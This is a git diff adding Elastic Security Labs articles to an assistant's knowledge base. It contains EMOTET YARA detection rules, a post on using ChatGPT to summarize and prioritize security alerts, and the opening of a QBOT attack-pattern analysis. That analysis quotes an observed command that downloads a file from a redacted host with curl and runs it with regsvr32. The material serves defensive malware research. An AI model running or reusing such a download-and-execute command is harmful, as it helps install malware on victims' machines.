+Elastic Security has created YARA rules to identify this activity. The YARA rules shown here are not meant to be used to solely detect EMOTET binaries, they are created to support the configuration extractor. The YARA rules for detecting EMOTET can be found in the [protections-artifacts repository](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Emotet.yar).
+
+#### EMOTET key decryption function
+
+```
+rule resolve_keys
+{
+meta:
+     author = "Elastic Security"
+     description = "EMOTET - find the key decoding algorithm in the PE"
+     creation_date = "2022-08-02"
+     last_modified = "2022-08-11"
+     os = "Windows"
+     family = "EMOTET"
+     threat_name = "Windows.Trojan.EMOTET"
+     reference_sample = "debad0131060d5dd9c4642bd6aed186c4a57b46b0f4c69f1af16b1ff9c0a77b1"
+   strings:
+       $chunk_1 = {
+        45 33 C9
+        4C 8B D0
+        48 85 C0
+        74 ??
+        48 8D ?? ??
+        4C 8B ??
+        48 8B ??
+        48 2B ??
+        48 83 ?? ??
+        48 C1 ?? ??
+        48 3B ??
+        49 0F 47 ??
+        48 85 ??
+        74 ??
+        48 2B D8
+        42 8B 04 03
+     }
+   condition:
+       any of them
+}
+```
+
+#### EMOTET C2 aggregation
+
+```
+rule c2_list
+{
+     author = "Elastic Security"
+     description = "EMOTET - find the C2 collection in the PE"
+     creation_date = "2022-08-02"
+     last_modified = "2022-08-11"
+     os = "Windows"
+     family = "EMOTET"
+     threat_name = "Windows.Trojan.EMOTET"
+     reference_sample = "debad0131060d5dd9c4642bd6aed186c4a57b46b0f4c69f1af16b1ff9c0a77b1"
+  strings:
+     $chunk_1 = {
+        48 8D 05 ?? ?? ?? ??
+        48 89 81 ?? ?? ?? ??
+        48 8D 05 ?? ?? ?? ??
+        48 89 81 ?? ?? ?? ??
+        48 8D 05 ?? ?? ?? ??
+        48 89 81 ?? ?? ?? ??
+        48 8D 05 ?? ?? ?? ??
+        48 89 81 ?? ?? ?? ??
+        48 8D 05 ?? ?? ?? ??
+        48 89 81 ?? ?? ?? ??
+        48 8D 05 ?? ?? ?? ??
+        48 89 81 ?? ?? ?? ??
+        48 8D 05 ?? ?? ?? ??
+        48 89 81 ?? ?? ?? ??
+     }
+  condition:
+     any of them
+}
+```
+
+#### EMOTET string decoder
+
+```
+rule string_decode
+{
+   meta:
+     author = "Elastic Security"
+     description = "EMOTET - find the string decoding algorithm in the PE"
+     creation_date = "2022-08-02"
+     last_modified = "2022-08-11"
+     os = "Windows"
+     family = "EMOTET"
+     threat_name = "Windows.Trojan.EMOTET"
+     reference_sample = "debad0131060d5dd9c4642bd6aed186c4a57b46b0f4c69f1af16b1ff9c0a77b1"
+  strings:
+     $chunk_1 = {
+        8B 0B
+        49 FF C3
+        48 8D 5B ??
+        33 CD
+        0F B6 C1
+        66 41 89 00
+        0F B7 C1
+        C1 E9 10
+        66 C1 E8 08
+        4D 8D 40 ??
+        66 41 89 40 ??
+        0F B6 C1
+        66 C1 E9 08
+        66 41 89 40 ??
+        66 41 89 48 ??
+        4D 3B D9
+        72 ??
+     }
+     $chunk_2 = {
+        8B 0B
+        49 FF C3
+        48 8D 5B ??
+        33 CD
+        0F B6 C1
+        66 41 89 00
+        0F B7 C1
+        C1 E9 ??
+        66 C1 E8 ??
+        4D 8D 40 ??
+        66 41 89 40 ??
+        0F B6 C1
+        66 C1 E9 ??
+        66 41 89 40 ??
+        66 41 89 48 ??
+        4D 3B D9
+        72 ??
+     }
+  condition:
+     any of them
+}
+```
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/exploring_applications_of_chatgpt_to_improve_detection_response_and_understanding.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/exploring_applications_of_chatgpt_to_improve_detection_response_and_understanding.md
new file mode 100644
index 0000000000000..aa8a9242db784
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/exploring_applications_of_chatgpt_to_improve_detection_response_and_understanding.md
@@ -0,0 +1,199 @@
+---
+title: "Exploring the Future of Security with ChatGPT"
+slug: "exploring-applications-of-chatgpt-to-improve-detection-response-and-understanding"
+date: "2023-04-24"
+subtitle: "Ambitious applications of ChatGPT to improve detection, response, and understanding"
+description: "Recently, OpenAI announced APIs for engineers to integrate ChatGPT and Whisper models into their apps and products. For some time, engineers could use the REST API calls for older models and otherwise use the ChatGPT interface through their website."
+author:
+  - slug: mika-ayenson
+image: "blog-elastic-train.jpg"
+category:
+  - slug: detection-science
+  - slug: machine-learning
+  - slug: security-operations
+  - slug: security-research
+  - slug: generative-ai
+---
+
+### Preamble
+
+Recently, OpenAI [announced](https://openai.com/blog/introducing-chatgpt-and-whisper-apis) APIs for engineers to integrate [ChatGPT](https://chat.openai.com/chat) and Whisper models into their apps and products. For some time, engineers could use the REST API calls for older models and otherwise use the ChatGPT interface through their website. Now there's an opportunity to prototype and experiment with Large Language Models (LLMs) to assist with security use cases.
+
+The defensively-minded possibilities are endless for applying the older [gpt-3.5-turbo](https://platform.openai.com/docs/models/gpt-3-5) and soon [gpt-4](https://platform.openai.com/docs/models/gpt-4) models but here are just a few ideas:
+
+- Chatbot-assisted Incident Response: Creating a chatbot that can identify and respond to security incidents in real-time to achieve a desired outcome. The chatbot can use ChatGPT to analyze the incident and provide an appropriate and configurable response (e.g. execute response actions, recommend new queries, etc.).
+- Threat information: Using ChatGPT to analyze threat data and generate reports for your security product. This will help to improve the mean-time to respond.
+- Natural language search: Implementing natural language search capabilities in your security product. ChatGPT can be used to understand and optimize search queries, for more accurate and relevant results.
+- Anomaly detection: Using ChatGPT to analyze event data to identify anomalies that may indicate a security breach (although will require local domain context training).
+- Security policy chatbot: Creating a chatbot that can answer security-related questions while investigating threats. The chatbot can use ChatGPT to provide accurate and relevant answers to questions about security policies, best practices, summarizing information, and more.
+- Alert prioritization: Using the data within the alerts to group and prioritize the most relevant information to the analyst for an expedited response.
+
+#### Overview
+
+The relevance of results from a tool like ChatGPT depends a great deal on the data provided and the question asked. Garbage in: garbage out. To minimize costs during prototyping, we chose a small number of available fields (see below). There will always be a bit of tuning and engineering to get the best out of a model like this.
+
+The following fields are included:
+
+```
+"event.kind",
+"signal.rule.severity",
+"kibana.alert.rule.name",
+"signal.reason",
+"signal.rule.type",
+"signal.rule.interval",
+"signal.rule.risk_score",
+"kibana.alert.rule.producer",
+"kibana.alert.rule.description"
+```
+
+If you decide to play around with the [code](https://gist.github.com/Mikaayenson/9efff700e5d799c672c6b17338d2de6a), feel free to modify the fields as needed. Also, we'd love to hear what you're doing if you've already pulled something together. Or if you just want to chat about cool ideas, feel free to reach out! Now let's get into some fun. 😎
+
+##### Simple use case: ELI5
+
+No matter how experienced you are in the security domain, there will always be changes and new developments. They keep the security world exciting but also challenge us to stay up to date, especially when it pertains to threats. But often the detection engineer that created a query to identify malicious activity is not the same person responding to a threat. And, notably, those individuals will prioritize different knowledge and come with their own sets of unique experiences.
+
+The following Example simply queries the detection engine for alerts and then explains them in several ways. Some of the explanations were insightful, and some were humorous. You should try it out yourself.
+
+##### Malicious Behavior Prevention alert
+
+From the [Suspicious Microsoft IIS Worker Descendant detection](https://www.elastic.co/guide/en/security/current/microsoft-exchange-worker-spawning-suspicious-processes.html) rule, we start with the first prompt “Summary the Elastic event:” and in each example, it's followed by the response provided by chatGPT.
+
+This first example is short and sweet, to highlight the basic functionality. Summarize the Elastic event:
+
+> The summary of the elastic event is that it produces a detection alert whenever a suspicious Microsoft IIS Worker Descendant is detected by Elastic Endpoint Security. This alert helps in investigating the endpoint alerts promptly.
+
+Sometimes you need to provide an explanation to a layperson without security experience or expertise The term “explain it like I’m five” originated in 2010 on Twitter and was later seen on the subreddit, r/explainlikeimfive. Language is hard. Explaining complicated or nuanced things is even harder. In the most endearing way possible, sometimes we just need someone to explain it like we’re five.
+
+Explain this Elastic event like I'm five:
+
+> So, you know how sometimes there are bad guys who try to do bad things on our computers? Well, there is a special program called Elastic Endpoint Security that helps protect our computers from those bad guys. When it detects something suspicious, it will send an alert to the grown-ups who are taking care of the computer. This alert has a special name - Malicious Behavior Prevention Alert: Suspicious Microsoft IIS Worker Descendant. Now, the people who take care of the computer have another special program called SIEM. SIEM keeps an eye on all the alerts that Elastic Endpoint Security sends, and if it sees one of these special alerts, it will tell the grown-ups right away so they can investigate and make sure everything is okay. So, this message just means that SIEM got an alert from Elastic Endpoint Security, and it's letting the grown-ups know so they can take care of it.
+
+Sometimes your kids may want to know how your day went. ChatGPT can even help in this (unconventional) area.
+
+Explain this event to my kids:
+
+> There was something weird that happened on a computer, and the people who take care of it wanted to know about it right away. They made a rule that sends an alert whenever something strange happens on that computer. This way, they can look into it and make sure everything is okay.
+
+This example is interesting. Without the context of what kind of leadership you have, this response may not be enough. It might even be interpreted as insulting 😅. Like any other tool, make sure you’re using it in a safe and appropriate way.
+
+Explain this event to my boss:
+
+> This event indicates that a rule named "Malicious Behavior Prevention Alert: Suspicious Microsoft IIS Worker Descendant" was triggered by the SIEM system. This rule is designed to generate an alert whenever any suspicious activity related to Elastic Endpoint Security is detected. By enabling this rule, we can quickly investigate any potential threats to our Endpoint security.
+
+This next example is great for training entry-level analysts. It provides intentional words that you want to hear when onboarding someone to a new role.
+
+Explain this event to the new graduate:
+
+> This event is a notification that a rule has been triggered to detect a suspicious behavior related to the Microsoft IIS Worker, which is a component of the web server software. This rule is meant to prevent any malicious behavior and generate an alert whenever an Elastic Endpoint Security alert is received. By enabling this rule, it helps to investigate the security threats quickly and take the necessary actions to mitigate them.
+
+We can prompt in different ways, and as expected get different responses.
+
+Explain what happened in this event:
+
+> This event is related to a detection alert rule named "Malicious Behavior Prevention Alert: Suspicious Microsoft IIS Worker Descendant," which was produced by a SIEM. The event type is "signal," which means that the alert has been triggered based on a specific condition. The purpose of this rule is to generate a detection alert every time an Elastic Endpoint Security alert is received, which helps in the immediate investigation of the endpoint alerts. Therefore, this event indicates the occurrence of suspicious activity related to Microsoft IIS Worker Descendants and the triggering of an alert by the detection rule.
+
+Clearly, there is room for improvement. In this next example, it preemptively explains, "Hey hey, don't ask for too much of me. I'm just an assistant."
+
+Explain this event to the CISO:
+
+> As a virtual assistant language model, I can explain the given event to the CISO with utmost accuracy and professionalism. This event signifies the activation of a rule in Kibana that generates an alert whenever there's suspicious behavior detected in Microsoft IIS worker descendant, which can be a potential threat to the organization's security. This rule is produced by the SIEM (Security Information and Event Management) system and is designed to detect malicious activities and alert the security team immediately. This event also mentions that the endpoint security system generates alerts that enable the security team to investigate and take necessary actions to mitigate threats. Overall, this event highlights the implementation of proactive security measures to ensure the safety of the organization's digital assets.
+
+This last example is particularly interesting because it just scratches the surface for how to guide the team responding to this event.
+
+What are next investigative steps to take based on this event:
+
+> - Determine the source of the Elastic Endpoint Security alert and investigate the details of the alert to understand the specific suspicious behavior detected.
+> - Review system logs to identify any other unusual activity within the network, particularly from the same system or IP address associated with the suspicious Microsoft IIS worker descendant.
+> - Check for any recent changes made to the Microsoft IIS configuration or permissions that may have triggered the alert.
+> - Assess the impact of the event on the affected system and determine if any data or systems were compromised.
+> - Identify and isolate the affected system or systems to prevent further spread of any potential malware or malicious activity.
+> - Review current security measures and identify any gaps or areas that can be improved to prevent similar incidents in the future.
+> - Report the event to the relevant authorities or stakeholders, if necessary.
+
+As you can see, this demo focuses on summarizing the gist of an alert. Imagine how powerful this could be if we decided to summarize all of the alerts for the week into a single summary for reporting. If we tweak the data sent to chatGPT and provide more fields, then we should anticipate getting more accurate responses. That engineering tradeoff of determining what the most important fields to send to get the clearest picture in a time-sensitive fashion is worth the investment. Now, let's explore one more use case.
+
+#### Alert prioritization
+
+Response times can impact the severity and outcome of an incident. In challenging situations (e.g. alert fatigue, high volume of alerts, lack of training, constrained resources, etc.), responders struggle with determining what to do first. For example, which alert should be investigated and why? Perhaps ChatGPT can help in this area. 🤔
+
+Here are some example alerts that we use in the next set of conversations. Again, the data in these sample alerts are limited to a subset of fields available to conserve tokens.
+
+##### Sample alerts
+
+> ```
+> {'kibana.alert.last_detected': '2023-02-28T16:59:46.600Z', 'kibana.alert.rule.execution.uuid': 'bcbdfcd7-ba8a-4ed2-a203-4f23d77480ec', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: DARKRADIATION Ransomware Infection', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.'} {'kibana.alert.last_detected': '2023-02-28T16:59:46.601Z', 'kibana.alert.rule.execution.uuid': 'bcbdfcd7-ba8a-4ed2-a203-4f23d77480ec', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: Suspicious Microsoft Office Child Process', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.'} {'kibana.alert.last_detected': '2023-02-28T16:59:46.601Z', 'kibana.alert.rule.execution.uuid': 'bcbdfcd7-ba8a-4ed2-a203-4f23d77480ec', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: DARKRADIATION Ransomware Infection', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.'} {'kibana.alert.last_detected': '2023-03-01T13:36:30.680Z', 'kibana.alert.rule.execution.uuid': '74f6a3e1-58d1-410d-bd22-6886be6c8cb7', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: Suspicious Microsoft IIS Worker Descendant', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.'} {'kibana.alert.last_detected': '2023-03-01T13:36:30.680Z', 'kibana.alert.rule.execution.uuid': '74f6a3e1-58d1-410d-bd22-6886be6c8cb7', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: Suspicious Microsoft IIS Worker Descendant', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.'} {'kibana.alert.last_detected': '2023-03-01T12:46:02.800Z', 'kibana.alert.rule.execution.uuid': '0025ed3f-c41c-40ea-bd29-babd28b154b4', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: Suspicious Microsoft IIS Worker Descendant', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.'} {'kibana.alert.last_detected': '2023-02-28T17:04:49.582Z', 'kibana.alert.rule.execution.uuid': '2d4965c5-a345-4f47-9deb-4135b178c7f3', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: Suspicious Bitsadmin Activity', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.'} {'kibana.alert.last_detected': '2023-03-07T20:42:25.969Z', 'kibana.alert.rule.execution.uuid': 'd3f35957-a4e5-445b-b86f-e91814274dcb', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: DARKRADIATION Ransomware Infection', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.'} {'kibana.alert.last_detected': '2023-03-07T20:42:25.969Z', 'kibana.alert.rule.execution.uuid': 'd3f35957-a4e5-445b-b86f-e91814274dcb', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: DARKRADIATION Ransomware Infection', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.'} {'kibana.alert.last_detected': '2023-03-07T20:42:25.970Z', 'kibana.alert.rule.execution.uuid': 'd3f35957-a4e5-445b-b86f-e91814274dcb', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: Suspicious Bitsadmin Activity', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.'}
+> ```
+
+When we ask ChatGPT "Which one of these alerts should I prioritize?", we get a few interesting responses. Feel free to expand the entries below to see the actual responses.
+
+The first response doesn't answer the question. It admits that it's a challenging question and provides some general guidance on how to triage alerts. We can try modifying the prompt to get closer to a specific answer.
+
+##### Generic response
+
+In the next response we again receive a general response 😓, but simply repeating the same question. This time, however, it attempts to provide more specific recommendations based on the fields provided. The message is interesting, but we want to know how to prioritize alerts, not receive a general description of the alerts.
+
+##### Generic response with field details
+
+> It's difficult to prioritize these alerts without more context, as it depends on the severity and impact of each alert, as well as the current state of the system being monitored. However, here are some general guidelines based on the information provided: The alerts with the most recent "kibana.alert.last_detected" timestamp may be more urgent, as they indicate a more recent occurrence of a potentially malicious activity. Alerts with the same "kibana.alert.rule.name" and "kibana.alert.rule.description" but different "kibana.alert.rule.execution.uuid" may indicate multiple instances of the same type of activity, and may be worth investigating further. Alerts with different "kibana.alert.rule.name" and "kibana.alert.rule.description" may indicate different types of malicious activity, and should be evaluated based on their severity and impact on the system. Ultimately, the best course of action is to have a clear plan and protocol for responding to alerts, and to evaluate each alert based on its specific context and potential impact on the system being monitored.
+
+After adding the new fields to the original events, we get a more informed response (as expected). We try adding two fields that should dramatically impact the response and recommendations provided.
+
+Feeding more context to ChatGPT can always help get a better answer, but remember when cost is a concern, sometimes we have to be very picky about which fields (and how much data) we want to send. To no surprise, we immediately obtain improved responses after adding these important pieces of information. In this case, since the alerts are all very similar, it chooses the timestamp to prioritize the alert.
+
+> "kibana.alert.rule.risk_score", "kibana.alert.rule.severity",
+
+##### Prioritizing recommendation
+
+> It seems like all the alerts have the same information and are related to the same type of alert: Malicious Behavior Prevention Alert. They are all of medium severity and have the same risk score. Therefore, I suggest investigating the most recent alert since it was detected at a later time, and it might indicate that the issue is ongoing or has occurred again. In this case, the alert with the timestamp of 2023-03-07T20:42:25.969Z is the most recent one, so I recommend prioritizing it. However, I would still recommend investigating all the alerts since they are related to the same type of threat and could provide valuable information for understanding and mitigating the issue.
+
+We can try shrinking similar alerts down to one alert by rule name to see how the volume of alerts (in a contrived way) impacts the response. Yet again, we get a slightly more direct response even though the alerts have the same risk score and severity level. At least this time we get a specific rule name somewhere in the response.
+
+##### Reduced sample alerts by rule name
+
+> ```
+> {'kibana.alert.last_detected': '2023-03-07T20:42:25.969Z', 'kibana.alert.rule.execution.uuid': 'd3f35957-a4e5-445b-b86f-e91814274dcb', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: DARKRADIATION Ransomware Infection', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.', 'kibana.alert.rule.risk_score': 74, 'kibana.alert.rule.severity': 'critical'} {'kibana.alert.last_detected': '2023-03-07T20:42:25.970Z', 'kibana.alert.rule.execution.uuid': 'd3f35957-a4e5-445b-b86f-e91814274dcb', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: Suspicious Bitsadmin Activity', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.', 'kibana.alert.rule.risk_score': 47, 'kibana.alert.rule.severity': 'medium'} {'kibana.alert.last_detected': '2023-03-07T20:42:25.970Z', 'kibana.alert.rule.execution.uuid': 'd3f35957-a4e5-445b-b86f-e91814274dcb', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: Suspicious Microsoft Office Child Process', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.', 'kibana.alert.rule.risk_score': 21, 'kibana.alert.rule.severity': 'low'}
+> ```
+
+##### Prioritized alert
+
+> Based on the information provided, all three alerts have the same risk score and severity level, and they appear to be related to the same type of detection for malicious behavior in the Elastic Endpoint Security system. Therefore, it may be important to investigate all three alerts to ensure that there are no broader patterns of malicious activity in the system. However, if there are limitations on resources and time available for investigation, it may be reasonable to prioritize the alert with the most specific and detailed name and description, which in this case is "Malicious Behavior Prevention Alert: DARKRADIATION Ransomware Infection." This alert may indicate a more serious and urgent threat that requires immediate attention.
+
+Finally, we manipulate the fields to change the severity and risk score for experimental purposes and set the DARKRADIATION alert to a critical severity and high-risk score. We end the exploration with a direct response based on specific fields recommending the alert DARKRADIATION, and ChatGPT explains why the alert is the best choice, which is closer to what we're looking for.
+
+So why would we want to use an LLM if we can simply prioritize alerts using a rules-based strategy (e.g. sort alerts by highest severity)? As we saw earlier, other factors can impact the response (volume of alerts, the similarity of alerts, etc.), where at the end of the day the recommendation may be ultimately based on a timestamp or another field provided that is not as obvious to the responder.
+
+##### Sample alerts with varying severity & risk score
+
+> ```
+> {'kibana.alert.last_detected': '2023-03-07T20:42:25.969Z', 'kibana.alert.rule.execution.uuid': 'd3f35957-a4e5-445b-b86f-e91814274dcb', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: DARKRADIATION Ransomware Infection', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.', 'kibana.alert.rule.risk_score': 74, 'kibana.alert.rule.severity': 'critical'} {'kibana.alert.last_detected': '2023-03-07T20:42:25.970Z', 'kibana.alert.rule.execution.uuid': 'd3f35957-a4e5-445b-b86f-e91814274dcb', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: Suspicious Bitsadmin Activity', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.', 'kibana.alert.rule.risk_score': 47, 'kibana.alert.rule.severity': 'medium'} {'kibana.alert.last_detected': '2023-03-07T20:42:25.970Z', 'kibana.alert.rule.execution.uuid': 'd3f35957-a4e5-445b-b86f-e91814274dcb', 'kibana.alert.rule.name': 'Malicious Behavior Prevention Alert: Suspicious Microsoft Office Child Process', 'kibana.alert.rule.producer': 'siem', 'event.kind': 'signal', 'kibana.alert.rule.description': 'Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.', 'kibana.alert.rule.risk_score': 21, 'kibana.alert.rule.severity': 'low'}
+> ```
+
+##### Prioritized alert with details
+
+> Based on the severity and risk scores provided in the alerts, the Malicious Behavior Prevention Alert for DARKRADIATION Ransomware Infection should be prioritized. This alert has a severity level of "critical" and a risk score of 74, which indicates that it poses a significant threat and requires immediate attention. In comparison, the other two alerts have lower severity levels and risk scores, suggesting that they are of lower priority. However, it's worth noting that the specific context and environment in which these alerts were generated could also impact their prioritization. Therefore, it's important to carefully evaluate all available information before making a final decision.
+
+We've always known more context potentially can yield better responses. In this case, we used a combination of 1) reducing the alerts by Rule Name, and 2) providing more useful fields targeted to the question we wanted to answer. If we change the question, then we most likely need to provide different fields, which gets back to a broader question of what data should we provide to cost-effectively get the answer we're looking for.
+
+##### Small discussion on LLMs for undesirable outcomes
+
+The major question here is, how can the security industry take advantage of LLMs like ChatGPT to prepare for undesirable outcomes (e.g., data breach, malware infection, insider threat, DOS-type cyber attack). This topic drives towards an exciting new topic of domain-specific context, and if LLM is the giant machine, then what will we get out of it?
+
+Here are some well-known concepts that we can tap into: - Contextualizing alerts: Deep diving through past alerts and providing relevant insights to the analyst.
+
+- Training new models: Applying transfer-learning techniques to train new predictive models that are tailored to an organization's specific dataset and security needs. This training would cover large sets of historical reports, logs, ELT-prepped network traffic, responses, etc.
+
+- Automating all the things: Automating the mundane tasks away, sounds simple, but will challenge our ability to trust in automation.
+
+- Threat modeling: Create highly representative threat models and attacks that adversaries may exploit to reinforce and improve an organization's security posture.
+
+We've seen the security world gravitate towards ML for anomaly detection. As more of these LLMs become available and grow in capability, we have to tune ChatGPT magic to fit in our existing workflows and be comfortable replacing/upgrading old processes. At the very least, new ChatGPT applications will inspire new research questions, experiments, and proofs-of-concept. The key factor is not who develops the initial security-LLM application, but rather who can derive the most benefit from it for their product or organization.
+
+Start asking the questions. What am I missing in my policy? What gaps are in my detections? What does this alert mean? These types of questions will lead to great opportunities to use LLMs and add the extra protection you may have missed. With [GPT-4’](https://openai.com/research/gpt-4)s release and image capabilities, improved reasoning creates even more opportunities to extend into the security domain. Just imagine capturing user activities in a graphic that morphs over time (e.g. standard plot, rorschach graphic, etc.) and using a future GPT-X that can interpret trends, detect anomalies, or even track entity analytics! The classification and analysis possibilities are endless, and I encourage everyone to continue merging into new domains.
+
+It was fun playing around with the overlapping domains of security and LLMs, and the gist file we provide may one day evolve into a full project. 🤷 We didn't prove out all of the use cases, but that leaves room for future opportunities, research, POCs and research to explore with the future versions of gpt!
+
+We hope you enjoyed the read! See below for how to get started with the summary demo.
+
+##### Try it yourself!
+
+If you want to try this out for yourself, you'll need a few things. - [Signup](https://platform.openai.com/signup) to get an OpenAI account, following the [guide](https://help.openai.com/en/articles/5112595-best-practices-for-api-key-safety) for best practices. - Grab the [gist](https://gist.github.com/Mikaayenson/9efff700e5d799c672c6b17338d2de6a), which has the code. Disclaimer: The API continues to evolve, which may require minor changes. - This example uses Elastic, so [Signup](https://www.elastic.co/cloud/cloud-trial-overview/security) to get a free Elastic security trial. You will also benefit from having some experience with the [security detection engin](https://www.elastic.co/guide/en/security/current/detection-engine-overview.html)e.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/exploring_the_qbot_attack_pattern.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/exploring_the_qbot_attack_pattern.md
new file mode 100644
index 0000000000000..66ae3c6830adc
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/exploring_the_qbot_attack_pattern.md
@@ -0,0 +1,474 @@
+---
+title: "Exploring the QBOT Attack Pattern"
+slug: "exploring-the-qbot-attack-pattern"
+date: "2022-08-22"
+subtitle: "QBOT attack pattern and malware observations"
+description: "In this research publication, we'll explore our analysis of the QBOT attack pattern — a full-featured and prolific malware family."
+author:
+  - slug: cyril-francois
+  - slug: seth-goodwin
+  - slug: andrew-pease
+image: "blog-security-endpoint-720x420.png"
+category:
+  - slug: attack-pattern
+  - slug: activity-group
+tags:
+  - ref3726
+  - qbot
+  - qakbot
+---
+
+## Key Takeaways
+
+- QBOT is a popular, actively developed, and full-featured trojan
+- Adversary-controlled or owned infrastructure has been observed being used by numerous samples
+- The analyzed sample leverages multiple persistence and defense evasion mechanisms
+
+## Preamble
+
+Elastic Security Labs has been tracking REF3726, an attack pattern for the QBOT malware family. QBOT, also known as [QAKBOT](https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot), is a prolific modular trojan that has been active since around 2007. QBOT’s loading mechanism makes it an attractive framework to threat actors and ransomware groups and has led to widespread infections of the family; targeting victims across multiple verticals.
+
+This research covers:
+
+- Execution chain
+- Defense evasion
+- Persistence mechanisms
+- Privilege escalation
+- Network events
+- QBOT configuration extractor
+- Observed tactics and techniques
+
+Through this research, from static and dynamic analysis and Elastic telemetry, we uncovered 138 adversary-controlled or owned IP addresses. These IP addresses were linked to our sample and used to identify 339 additional associated malicious files. All artifacts are provided as STIX JSON and Elastic Common Schema (ECS) documents.
+
+> For information on the QBOT configuration extractor and malware analysis, check out our blog posts detailing this:
+>
+> - [QBOT Configuration Extractor](https://www.elastic.co/security-labs/qbot-configuration-extractor)
+> - [QBOT Malware Analysis](https://www.elastic.co/security-labs/qbot-malware-analysis)
+
+## Analysis Environment
+
+We selected a sample for analysis that we could statically and dynamically analyze. This process is commonly used to enrich both types of analysis. For the dynamic analysis, the sample was detonated on a Windows 10 Enterprise VM running the Elastic Endpoint, the Windows and Network Packet Capture Elastic Agent integrations, and an aggressive endpoint logging policy. All events were shipped to our Elastic Cloud cluster and processed through the Elastic Security App. The Elastic Security Endpoint was configured for Alerting and Eventing only (no Prevention). Alerts were generated from Detection Rules in the Security App and directly from the Elastic Security Endpoint default ruleset.
+
+## Execution Chain
+
+The following section will describe the observed execution chain for the Qbot malware sample. This includes events from Initial Execution to Defense Evasion to Persistence to Privilege Escalation.
+
+![Full execution chain of the QBOT malware sample](/assets/images/exploring-the-qbot-attack-pattern/full_process_execution_chain.jpg)
+
+### Initial Execution
+
+The initial execution of the QBOT sample was observed in Elastic’s telemetry data (derived from @proxylife’s [published research](https://twitter.com/pr0xylife/status/1539601609730170882?s=20&t=G-XR7ibeOO0nWCWajKWTKw) on QBOT).
+
+```
+**"C:\Windows\System32\cmd.exe" /q /c echo 'Ft' && ping REDACTED[.]com && MD "\\vyr" && curl.exe -o \\vyr\v4QpQt.Nqv.e8xO https://REDACTED[.]net/t8EKnIB/C.png && echo "sxF" && ping REDACTED[.]com && regsvr32 "\\vyr\v4QpQt.Nqv.e8xO"**
+```
+
